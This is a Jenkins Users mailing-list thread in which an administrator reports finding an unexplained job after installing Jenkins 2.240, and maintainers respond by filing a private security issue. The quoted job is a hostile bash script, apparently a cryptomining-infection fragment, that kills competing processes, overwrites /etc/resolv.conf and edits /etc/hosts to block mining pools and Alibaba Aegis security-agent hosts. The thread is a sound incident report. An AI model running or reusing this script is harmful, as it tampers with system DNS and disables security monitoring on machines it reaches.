Potential Malware

classic Classic list List threaded Threaded
4 messages Options
Reply | Threaded
Open this post in threaded view
|

Potential Malware

Randall Becker
Hi All,

We just installed Jenkins 2.240 and suddenly there is a job with some really strange content, including:

#!/bin/bash

threadCount=$(lscpu | grep 'CPU(s)' | grep -v ',' | awk '{print $2}' | head -n 1);
hostHash=$(hostname -f | md5sum | cut -c1-8);
echo "${hostHash} - ${threadCount}";
ktr () {
    killall trace;pkill -9 -f trace;killall -s SIGKILL trace
    killall vunix;pkill -9 -f vunix;killall -s SIGKILL vunix
    killall viunix;pkill viunix;killall -s SIGKILL viunix
    kill -9 $(ps -ux | grep trace | awk '{ print $2 }')
    kill -9 $(ps -ux | grep vunix | awk '{ print $2 }')
    kill -9 $(ps -ux | grep viunix | awk '{ print $2 }')
    echo kill
}

ktr
ktr
ktr
echo plsfoodforcatsnlove
echo 'nameserver 1.1.1.1' > /etc/resolv.conf;echo 'nameserver 8.8.8.8' >> /etc/resolv.conf;echo 'nameserver 180.76.76.76' >> /etc/resolv.conf
echo "0.0.0.0 blockchain.info" >> /etc/hosts;echo "0.0.0.0 35.225.36.167" >> /etc/hosts;echo "0.0.0.0 100.100.25.3 jsrv.aegis.aliyun.com" >> /etc/hosts
echo "0.0.0.0 100.100.25.4 update.aegis.aliyun.co" >> /etc/hosts;echo "0.0.0.0 185.164.72.119" >> /etc/hosts;echo "0.0.0.0 163.172.191.181" >> /etc/hosts
echo "0.0.0.0 pool.supportxmr.com" >> /etc/hosts;echo "0.0.0.0 pinto.mamointernet.icu" >> /etc/hosts;echo "0.0.0.0 sdk.bce.baidu.com" >> /etc/hosts
echo "0.0.0.0 lsd.systemten.org" >> /etc/hosts;
echo "0.0.0.0 pool.minexmr.com" >> /etc/hosts
echo "0.0.0.0 minexmr.com" >> /etc/hosts

This is really creepy because this script cannot possibly run on our system (the good part). The bad part is that no one in our organization created this job. Is it possible that there is some malware floating around? Our Jenkins instance is hiding behind a firewall so there's no way in.

Thanks,
Randall

--
You received this message because you are subscribed to the Google Groups "Jenkins Users" group.
To unsubscribe from this group and stop receiving emails from it, send an email to [hidden email].
To view this discussion on the web visit https://groups.google.com/d/msgid/jenkinsci-users/389e7848-bad2-4044-ab9d-c3fd0f106256o%40googlegroups.com.
Reply | Threaded
Open this post in threaded view
|

Re: Potential Malware

Daniel Beck
Thanks for your report.

I filed an issue on your behalf in the Jenkins project's private security issue tracker. You should have gotten an email notification from Jira about it. Please provide more information there to help us investigate.


> On 22. Jun 2020, at 19:15, Randall Becker <[hidden email]> wrote:
>
> Hi All,
>
> We just installed Jenkins 2.240 and suddenly there is a job with some really strange content, including:
>
> #!/bin/bash
>
> threadCount=$(lscpu | grep 'CPU(s)' | grep -v ',' | awk '{print $2}' | head -n 1);
> hostHash=$(hostname -f | md5sum | cut -c1-8);
> echo "${hostHash} - ${threadCount}";
> ktr () {
>     killall trace;pkill -9 -f trace;killall -s SIGKILL trace
>     killall vunix;pkill -9 -f vunix;killall -s SIGKILL vunix
>     killall viunix;pkill viunix;killall -s SIGKILL viunix
>     kill -9 $(ps -ux | grep trace | awk '{ print $2 }')
>     kill -9 $(ps -ux | grep vunix | awk '{ print $2 }')
>     kill -9 $(ps -ux | grep viunix | awk '{ print $2 }')
>     echo kill
> }
>
> ktr
> ktr
> ktr
> echo plsfoodforcatsnlove
> echo 'nameserver 1.1.1.1' > /etc/resolv.conf;echo 'nameserver 8.8.8.8' >> /etc/resolv.conf;echo 'nameserver 180.76.76.76' >> /etc/resolv.conf
> echo "0.0.0.0 blockchain.info" >> /etc/hosts;echo "0.0.0.0 35.225.36.167" >> /etc/hosts;echo "0.0.0.0 100.100.25.3 jsrv.aegis.aliyun.com" >> /etc/hosts
> echo "0.0.0.0 100.100.25.4 update.aegis.aliyun.co" >> /etc/hosts;echo "0.0.0.0 185.164.72.119" >> /etc/hosts;echo "0.0.0.0 163.172.191.181" >> /etc/hosts
> echo "0.0.0.0 pool.supportxmr.com" >> /etc/hosts;echo "0.0.0.0 pinto.mamointernet.icu" >> /etc/hosts;echo "0.0.0.0 sdk.bce.baidu.com" >> /etc/hosts
> echo "0.0.0.0 lsd.systemten.org" >> /etc/hosts;
> echo "0.0.0.0 pool.minexmr.com" >> /etc/hosts
> echo "0.0.0.0 minexmr.com" >> /etc/hosts
>
> This is really creepy because this script cannot possibly run on our system (the good part). The bad part is that no one in our organization created this job. Is it possible that there is some malware floating around? Our Jenkins instance is hiding behind a firewall so there's no way in.
>
> Thanks,
> Randall
>
> --
> You received this message because you are subscribed to the Google Groups "Jenkins Users" group.
> To unsubscribe from this group and stop receiving emails from it, send an email to [hidden email].
> To view this discussion on the web visit https://groups.google.com/d/msgid/jenkinsci-users/389e7848-bad2-4044-ab9d-c3fd0f106256o%40googlegroups.com.

--
You received this message because you are subscribed to the Google Groups "Jenkins Users" group.
To unsubscribe from this group and stop receiving emails from it, send an email to [hidden email].
To view this discussion on the web visit https://groups.google.com/d/msgid/jenkinsci-users/7C344B12-6DD6-42AD-B5F3-687EEC6012C8%40beckweb.net.
Reply | Threaded
Open this post in threaded view
|

Re: Potential Malware

Jan Monterrubio
Randall/Daniel, if there does end up being malware for this release would you mind replying on this thread? 

On Monday, June 22, 2020 at 1:00:09 PM UTC-5, Daniel Beck wrote:
Thanks for your report.

I filed an issue on your behalf in the Jenkins project's private security issue tracker. You should have gotten an email notification from Jira about it. Please provide more information there to help us investigate.


> On 22. Jun 2020, at 19:15, Randall Becker <<a href="javascript:" target="_blank" gdf-obfuscated-mailto="wu5FvLhbBgAJ" rel="nofollow" onmousedown="this.href=&#39;javascript:&#39;;return true;" onclick="this.href=&#39;javascript:&#39;;return true;">the....@...> wrote:
>
> Hi All,
>
> We just installed Jenkins 2.240 and suddenly there is a job with some really strange content, including:
>
> #!/bin/bash
>
> threadCount=$(lscpu | grep 'CPU(s)' | grep -v ',' | awk '{print $2}' | head -n 1);
> hostHash=$(hostname -f | md5sum | cut -c1-8);
> echo "${hostHash} - ${threadCount}";
> ktr () {
>     killall trace;pkill -9 -f trace;killall -s SIGKILL trace
>     killall vunix;pkill -9 -f vunix;killall -s SIGKILL vunix
>     killall viunix;pkill viunix;killall -s SIGKILL viunix
>     kill -9 $(ps -ux | grep trace | awk '{ print $2 }')
>     kill -9 $(ps -ux | grep vunix | awk '{ print $2 }')
>     kill -9 $(ps -ux | grep viunix | awk '{ print $2 }')
>     echo kill
> }
>
> ktr
> ktr
> ktr
> echo plsfoodforcatsnlove
> echo 'nameserver 1.1.1.1' > /etc/resolv.conf;echo 'nameserver 8.8.8.8' >> /etc/resolv.conf;echo 'nameserver 180.76.76.76' >> /etc/resolv.conf
> echo "0.0.0.0 <a href="http://blockchain.info" target="_blank" rel="nofollow" onmousedown="this.href=&#39;http://www.google.com/url?q\x3dhttp%3A%2F%2Fblockchain.info\x26sa\x3dD\x26sntz\x3d1\x26usg\x3dAFQjCNH8_sxkZYwobnC1o811qO_t-8wlWQ&#39;;return true;" onclick="this.href=&#39;http://www.google.com/url?q\x3dhttp%3A%2F%2Fblockchain.info\x26sa\x3dD\x26sntz\x3d1\x26usg\x3dAFQjCNH8_sxkZYwobnC1o811qO_t-8wlWQ&#39;;return true;">blockchain.info" >> /etc/hosts;echo "0.0.0.0 35.225.36.167" >> /etc/hosts;echo "0.0.0.0 100.100.25.3 <a href="http://jsrv.aegis.aliyun.com" target="_blank" rel="nofollow" onmousedown="this.href=&#39;http://www.google.com/url?q\x3dhttp%3A%2F%2Fjsrv.aegis.aliyun.com\x26sa\x3dD\x26sntz\x3d1\x26usg\x3dAFQjCNF0zSsZZr9ZP8v1cmY5x_eAfpav6w&#39;;return true;" onclick="this.href=&#39;http://www.google.com/url?q\x3dhttp%3A%2F%2Fjsrv.aegis.aliyun.com\x26sa\x3dD\x26sntz\x3d1\x26usg\x3dAFQjCNF0zSsZZr9ZP8v1cmY5x_eAfpav6w&#39;;return true;">jsrv.aegis.aliyun.com" >> /etc/hosts
> echo "0.0.0.0 100.100.25.4 <a href="http://update.aegis.aliyun.co" target="_blank" rel="nofollow" onmousedown="this.href=&#39;http://www.google.com/url?q\x3dhttp%3A%2F%2Fupdate.aegis.aliyun.co\x26sa\x3dD\x26sntz\x3d1\x26usg\x3dAFQjCNGYHfR8mjehUhs5RqZ86torx7CrJw&#39;;return true;" onclick="this.href=&#39;http://www.google.com/url?q\x3dhttp%3A%2F%2Fupdate.aegis.aliyun.co\x26sa\x3dD\x26sntz\x3d1\x26usg\x3dAFQjCNGYHfR8mjehUhs5RqZ86torx7CrJw&#39;;return true;">update.aegis.aliyun.co" >> /etc/hosts;echo "0.0.0.0 185.164.72.119" >> /etc/hosts;echo "0.0.0.0 163.172.191.181" >> /etc/hosts
> echo "0.0.0.0 <a href="http://pool.supportxmr.com" target="_blank" rel="nofollow" onmousedown="this.href=&#39;http://www.google.com/url?q\x3dhttp%3A%2F%2Fpool.supportxmr.com\x26sa\x3dD\x26sntz\x3d1\x26usg\x3dAFQjCNEAoDVNyuZcZ80buhjLezs_Iwk-tw&#39;;return true;" onclick="this.href=&#39;http://www.google.com/url?q\x3dhttp%3A%2F%2Fpool.supportxmr.com\x26sa\x3dD\x26sntz\x3d1\x26usg\x3dAFQjCNEAoDVNyuZcZ80buhjLezs_Iwk-tw&#39;;return true;">pool.supportxmr.com" >> /etc/hosts;echo "0.0.0.0 pinto.mamointernet.icu" >> /etc/hosts;echo "0.0.0.0 <a href="http://sdk.bce.baidu.com" target="_blank" rel="nofollow" onmousedown="this.href=&#39;http://www.google.com/url?q\x3dhttp%3A%2F%2Fsdk.bce.baidu.com\x26sa\x3dD\x26sntz\x3d1\x26usg\x3dAFQjCNHI3-INnY-uULKhY_Mh5ZclndPRHQ&#39;;return true;" onclick="this.href=&#39;http://www.google.com/url?q\x3dhttp%3A%2F%2Fsdk.bce.baidu.com\x26sa\x3dD\x26sntz\x3d1\x26usg\x3dAFQjCNHI3-INnY-uULKhY_Mh5ZclndPRHQ&#39;;return true;">sdk.bce.baidu.com" >> /etc/hosts
> echo "0.0.0.0 <a href="http://lsd.systemten.org" target="_blank" rel="nofollow" onmousedown="this.href=&#39;http://www.google.com/url?q\x3dhttp%3A%2F%2Flsd.systemten.org\x26sa\x3dD\x26sntz\x3d1\x26usg\x3dAFQjCNFdhqNuDDUM0Ct7Uhn76witmA7Bog&#39;;return true;" onclick="this.href=&#39;http://www.google.com/url?q\x3dhttp%3A%2F%2Flsd.systemten.org\x26sa\x3dD\x26sntz\x3d1\x26usg\x3dAFQjCNFdhqNuDDUM0Ct7Uhn76witmA7Bog&#39;;return true;">lsd.systemten.org" >> /etc/hosts;
> echo "0.0.0.0 <a href="http://pool.minexmr.com" target="_blank" rel="nofollow" onmousedown="this.href=&#39;http://www.google.com/url?q\x3dhttp%3A%2F%2Fpool.minexmr.com\x26sa\x3dD\x26sntz\x3d1\x26usg\x3dAFQjCNECXm_QQwKZzcrZP7QR3Yo8iUKpvQ&#39;;return true;" onclick="this.href=&#39;http://www.google.com/url?q\x3dhttp%3A%2F%2Fpool.minexmr.com\x26sa\x3dD\x26sntz\x3d1\x26usg\x3dAFQjCNECXm_QQwKZzcrZP7QR3Yo8iUKpvQ&#39;;return true;">pool.minexmr.com" >> /etc/hosts
> echo "0.0.0.0 <a href="http://minexmr.com" target="_blank" rel="nofollow" onmousedown="this.href=&#39;http://www.google.com/url?q\x3dhttp%3A%2F%2Fminexmr.com\x26sa\x3dD\x26sntz\x3d1\x26usg\x3dAFQjCNFrd4--r0m_dU0BUe0sk9WGWxhhFA&#39;;return true;" onclick="this.href=&#39;http://www.google.com/url?q\x3dhttp%3A%2F%2Fminexmr.com\x26sa\x3dD\x26sntz\x3d1\x26usg\x3dAFQjCNFrd4--r0m_dU0BUe0sk9WGWxhhFA&#39;;return true;">minexmr.com" >> /etc/hosts
>
> This is really creepy because this script cannot possibly run on our system (the good part). The bad part is that no one in our organization created this job. Is it possible that there is some malware floating around? Our Jenkins instance is hiding behind a firewall so there's no way in.
>
> Thanks,
> Randall
>
> --
> You received this message because you are subscribed to the Google Groups "Jenkins Users" group.
> To unsubscribe from this group and stop receiving emails from it, send an email to <a href="javascript:" target="_blank" gdf-obfuscated-mailto="wu5FvLhbBgAJ" rel="nofollow" onmousedown="this.href=&#39;javascript:&#39;;return true;" onclick="this.href=&#39;javascript:&#39;;return true;">jenkins...@googlegroups.com.
> To view this discussion on the web visit <a href="https://groups.google.com/d/msgid/jenkinsci-users/389e7848-bad2-4044-ab9d-c3fd0f106256o%40googlegroups.com" target="_blank" rel="nofollow" onmousedown="this.href=&#39;https://groups.google.com/d/msgid/jenkinsci-users/389e7848-bad2-4044-ab9d-c3fd0f106256o%40googlegroups.com&#39;;return true;" onclick="this.href=&#39;https://groups.google.com/d/msgid/jenkinsci-users/389e7848-bad2-4044-ab9d-c3fd0f106256o%40googlegroups.com&#39;;return true;">https://groups.google.com/d/msgid/jenkinsci-users/389e7848-bad2-4044-ab9d-c3fd0f106256o%40googlegroups.com.

--
You received this message because you are subscribed to the Google Groups "Jenkins Users" group.
To unsubscribe from this group and stop receiving emails from it, send an email to [hidden email].
To view this discussion on the web visit https://groups.google.com/d/msgid/jenkinsci-users/6004d523-9169-46dc-88f1-47c46542d6a3o%40googlegroups.com.
Reply | Threaded
Open this post in threaded view
|

Re: Potential Malware

Randall Becker
We have locked down the system and have not had a recurrence. If there is one, I will report it ASAP.

Thank you all for the concern :)

Cheers,
Randall

On Wednesday, 1 July 2020 09:55:06 UTC-4, Jan Monterrubio wrote:
Randall/Daniel, if there does end up being malware for this release would you mind replying on this thread? 

On Monday, June 22, 2020 at 1:00:09 PM UTC-5, Daniel Beck wrote:
Thanks for your report.

I filed an issue on your behalf in the Jenkins project's private security issue tracker. You should have gotten an email notification from Jira about it. Please provide more information there to help us investigate.


> On 22. Jun 2020, at 19:15, Randall Becker <[hidden email]> wrote:
>
> Hi All,
>
> We just installed Jenkins 2.240 and suddenly there is a job with some really strange content, including:
>
> #!/bin/bash
>
> threadCount=$(lscpu | grep 'CPU(s)' | grep -v ',' | awk '{print $2}' | head -n 1);
> hostHash=$(hostname -f | md5sum | cut -c1-8);
> echo "${hostHash} - ${threadCount}";
> ktr () {
>     killall trace;pkill -9 -f trace;killall -s SIGKILL trace
>     killall vunix;pkill -9 -f vunix;killall -s SIGKILL vunix
>     killall viunix;pkill viunix;killall -s SIGKILL viunix
>     kill -9 $(ps -ux | grep trace | awk '{ print $2 }')
>     kill -9 $(ps -ux | grep vunix | awk '{ print $2 }')
>     kill -9 $(ps -ux | grep viunix | awk '{ print $2 }')
>     echo kill
> }
>
> ktr
> ktr
> ktr
> echo plsfoodforcatsnlove
> echo 'nameserver 1.1.1.1' > /etc/resolv.conf;echo 'nameserver 8.8.8.8' >> /etc/resolv.conf;echo 'nameserver 180.76.76.76' >> /etc/resolv.conf
> echo "0.0.0.0 <a href="http://blockchain.info" rel="nofollow" target="_blank" onmousedown="this.href=&#39;http://www.google.com/url?q\x3dhttp%3A%2F%2Fblockchain.info\x26sa\x3dD\x26sntz\x3d1\x26usg\x3dAFQjCNH8_sxkZYwobnC1o811qO_t-8wlWQ&#39;;return true;" onclick="this.href=&#39;http://www.google.com/url?q\x3dhttp%3A%2F%2Fblockchain.info\x26sa\x3dD\x26sntz\x3d1\x26usg\x3dAFQjCNH8_sxkZYwobnC1o811qO_t-8wlWQ&#39;;return true;">blockchain.info" >> /etc/hosts;echo "0.0.0.0 35.225.36.167" >> /etc/hosts;echo "0.0.0.0 100.100.25.3 <a href="http://jsrv.aegis.aliyun.com" rel="nofollow" target="_blank" onmousedown="this.href=&#39;http://www.google.com/url?q\x3dhttp%3A%2F%2Fjsrv.aegis.aliyun.com\x26sa\x3dD\x26sntz\x3d1\x26usg\x3dAFQjCNF0zSsZZr9ZP8v1cmY5x_eAfpav6w&#39;;return true;" onclick="this.href=&#39;http://www.google.com/url?q\x3dhttp%3A%2F%2Fjsrv.aegis.aliyun.com\x26sa\x3dD\x26sntz\x3d1\x26usg\x3dAFQjCNF0zSsZZr9ZP8v1cmY5x_eAfpav6w&#39;;return true;">jsrv.aegis.aliyun.com" >> /etc/hosts
> echo "0.0.0.0 100.100.25.4 <a href="http://update.aegis.aliyun.co" rel="nofollow" target="_blank" onmousedown="this.href=&#39;http://www.google.com/url?q\x3dhttp%3A%2F%2Fupdate.aegis.aliyun.co\x26sa\x3dD\x26sntz\x3d1\x26usg\x3dAFQjCNGYHfR8mjehUhs5RqZ86torx7CrJw&#39;;return true;" onclick="this.href=&#39;http://www.google.com/url?q\x3dhttp%3A%2F%2Fupdate.aegis.aliyun.co\x26sa\x3dD\x26sntz\x3d1\x26usg\x3dAFQjCNGYHfR8mjehUhs5RqZ86torx7CrJw&#39;;return true;">update.aegis.aliyun.co" >> /etc/hosts;echo "0.0.0.0 185.164.72.119" >> /etc/hosts;echo "0.0.0.0 163.172.191.181" >> /etc/hosts
> echo "0.0.0.0 <a href="http://pool.supportxmr.com" rel="nofollow" target="_blank" onmousedown="this.href=&#39;http://www.google.com/url?q\x3dhttp%3A%2F%2Fpool.supportxmr.com\x26sa\x3dD\x26sntz\x3d1\x26usg\x3dAFQjCNEAoDVNyuZcZ80buhjLezs_Iwk-tw&#39;;return true;" onclick="this.href=&#39;http://www.google.com/url?q\x3dhttp%3A%2F%2Fpool.supportxmr.com\x26sa\x3dD\x26sntz\x3d1\x26usg\x3dAFQjCNEAoDVNyuZcZ80buhjLezs_Iwk-tw&#39;;return true;">pool.supportxmr.com" >> /etc/hosts;echo "0.0.0.0 pinto.mamointernet.icu" >> /etc/hosts;echo "0.0.0.0 <a href="http://sdk.bce.baidu.com" rel="nofollow" target="_blank" onmousedown="this.href=&#39;http://www.google.com/url?q\x3dhttp%3A%2F%2Fsdk.bce.baidu.com\x26sa\x3dD\x26sntz\x3d1\x26usg\x3dAFQjCNHI3-INnY-uULKhY_Mh5ZclndPRHQ&#39;;return true;" onclick="this.href=&#39;http://www.google.com/url?q\x3dhttp%3A%2F%2Fsdk.bce.baidu.com\x26sa\x3dD\x26sntz\x3d1\x26usg\x3dAFQjCNHI3-INnY-uULKhY_Mh5ZclndPRHQ&#39;;return true;">sdk.bce.baidu.com" >> /etc/hosts
> echo "0.0.0.0 <a href="http://lsd.systemten.org" rel="nofollow" target="_blank" onmousedown="this.href=&#39;http://www.google.com/url?q\x3dhttp%3A%2F%2Flsd.systemten.org\x26sa\x3dD\x26sntz\x3d1\x26usg\x3dAFQjCNFdhqNuDDUM0Ct7Uhn76witmA7Bog&#39;;return true;" onclick="this.href=&#39;http://www.google.com/url?q\x3dhttp%3A%2F%2Flsd.systemten.org\x26sa\x3dD\x26sntz\x3d1\x26usg\x3dAFQjCNFdhqNuDDUM0Ct7Uhn76witmA7Bog&#39;;return true;">lsd.systemten.org" >> /etc/hosts;
> echo "0.0.0.0 <a href="http://pool.minexmr.com" rel="nofollow" target="_blank" onmousedown="this.href=&#39;http://www.google.com/url?q\x3dhttp%3A%2F%2Fpool.minexmr.com\x26sa\x3dD\x26sntz\x3d1\x26usg\x3dAFQjCNECXm_QQwKZzcrZP7QR3Yo8iUKpvQ&#39;;return true;" onclick="this.href=&#39;http://www.google.com/url?q\x3dhttp%3A%2F%2Fpool.minexmr.com\x26sa\x3dD\x26sntz\x3d1\x26usg\x3dAFQjCNECXm_QQwKZzcrZP7QR3Yo8iUKpvQ&#39;;return true;">pool.minexmr.com" >> /etc/hosts
> echo "0.0.0.0 <a href="http://minexmr.com" rel="nofollow" target="_blank" onmousedown="this.href=&#39;http://www.google.com/url?q\x3dhttp%3A%2F%2Fminexmr.com\x26sa\x3dD\x26sntz\x3d1\x26usg\x3dAFQjCNFrd4--r0m_dU0BUe0sk9WGWxhhFA&#39;;return true;" onclick="this.href=&#39;http://www.google.com/url?q\x3dhttp%3A%2F%2Fminexmr.com\x26sa\x3dD\x26sntz\x3d1\x26usg\x3dAFQjCNFrd4--r0m_dU0BUe0sk9WGWxhhFA&#39;;return true;">minexmr.com" >> /etc/hosts
>
> This is really creepy because this script cannot possibly run on our system (the good part). The bad part is that no one in our organization created this job. Is it possible that there is some malware floating around? Our Jenkins instance is hiding behind a firewall so there's no way in.
>
> Thanks,
> Randall
>
> --
> You received this message because you are subscribed to the Google Groups "Jenkins Users" group.
> To unsubscribe from this group and stop receiving emails from it, send an email to [hidden email].
> To view this discussion on the web visit <a href="https://groups.google.com/d/msgid/jenkinsci-users/389e7848-bad2-4044-ab9d-c3fd0f106256o%40googlegroups.com" rel="nofollow" target="_blank" onmousedown="this.href=&#39;https://groups.google.com/d/msgid/jenkinsci-users/389e7848-bad2-4044-ab9d-c3fd0f106256o%40googlegroups.com&#39;;return true;" onclick="this.href=&#39;https://groups.google.com/d/msgid/jenkinsci-users/389e7848-bad2-4044-ab9d-c3fd0f106256o%40googlegroups.com&#39;;return true;">https://groups.google.com/d/msgid/jenkinsci-users/389e7848-bad2-4044-ab9d-c3fd0f106256o%40googlegroups.com.

--
You received this message because you are subscribed to the Google Groups "Jenkins Users" group.
To unsubscribe from this group and stop receiving emails from it, send an email to [hidden email].
To view this discussion on the web visit https://groups.google.com/d/msgid/jenkinsci-users/ee855a10-2327-40b5-95e2-8699bfc2f5d1o%40googlegroups.com.